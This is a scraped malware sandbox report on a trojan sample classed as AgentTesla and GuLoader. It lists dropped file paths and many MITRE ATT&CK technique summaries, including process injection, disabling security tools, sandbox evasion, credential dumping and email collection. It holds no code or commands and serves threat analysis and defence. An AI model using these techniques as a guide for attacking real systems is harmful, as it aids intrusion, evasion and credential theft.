Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Threatname: GuLoader

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6AE3.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BDE.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C1C.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D45.tmp.txt

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Temp\Adventure_19.bmp

C:\Users\user\AppData\Local\Temp\HPSUPD-Win32Exe.exe

C:\Users\user\AppData\Local\Temp\Sites.UDP

Windows Analysis Report
SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Description:	Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Tactics:	Credential Access, Discovery
Data Sources:	Host network interface, Netflow/Enclave netflow, Network device logs, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre